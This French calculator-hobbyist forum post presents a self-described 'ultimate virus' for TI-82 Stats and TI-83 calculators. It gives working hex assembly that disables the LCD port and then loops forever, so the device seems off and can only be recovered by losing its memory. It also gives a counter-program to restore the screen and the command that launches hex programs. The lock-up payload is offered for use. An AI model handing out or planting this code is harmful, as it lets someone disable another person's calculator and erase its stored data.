Par exemple, en désactivant les ports LCD de la TI. En gros, l'écran s'éteint, alors que la TI est toujours allumée et qu'elle tourne toujours.
Vous pouvez faire n'importe quoi, elle paraîtra éteinte, même si elle ne l'est pas. Même en changeant les piles. Vous n'arriverez a rien

la seule solution est de créer à l'aveuglette un programme hexa contraire qui rallumera le port LCD.
M'apprêtant a poster ça sur le forum, je croise notre cher Matref qui se connecte sur le Chat, et qui a l'idée de rajouter derrière une boucle infinie.
Efficace, non ? Comme ça, on ne pourra pas retaper de programme derrière.
En gros, j'ai l'honneur de vous présenter le virus ultime pour TI-82 stats/TI-82 stats.fr/TI-83 qui vous bouzille votre TI:
- Code: Select all
:3E02D31018FCC9
:End
:0000
:End
Bon, techniquement, le seul moyen de récupérer votre TI (et encore, vous aurez perdu votre mémoire), sera d'enlever une pile, de la remettre, d'éteindre la TI, de la rallumer (bien que vous la voyiez toujours éteinte), et de créer a l'aveuglette un nouveau programme:
:3E03D310C9
:End:0000:End
Et bien sur, le programme qui sert à lancer tout programme en hexa (assembleur précompilé):
:Envoi(9prgmNOMDUPROGRAMME